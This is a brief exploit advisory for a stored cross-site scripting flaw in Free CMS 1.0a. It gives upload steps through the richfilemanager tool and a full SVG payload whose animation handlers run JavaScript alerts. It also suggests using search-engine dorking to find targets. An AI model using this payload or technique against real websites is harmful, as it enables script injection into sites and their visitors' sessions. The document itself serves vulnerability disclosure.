Free CMS version 1.0a suffers from a cross site scripting vulnerability via a malicious upload.
f7244cde5992ef52505716a326d4e1c6
============================================================================================================================
| # Title : Free cms 1.0a xss via file uploads Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://download2.nust.na/pub4/sourceforge/f/fr/free-cms-for-your-websites/Free_cms_installation_1.0a.zip |
| # Dork : n/a |
============================================================================================================================
POC :
[+] Dorking Adegn Google Or Other Search Enggine .
[+] use payload : tools/richfilemanager/
http://127.0.0.1/!Free_cms_installation_1.0a/tools/richfilemanager/
[+] choose your file svg and upload it .
svg code
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00">
<set attributeName="fill" attributeType="CSS" onbegin='alert(/indoushka/)' onend='alert(/packet strom security/)' to="#00F" begin="1s" dur="5s" />
</circle>
</defs>
<use xlink:href="#indoushka"/>
</svg>
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================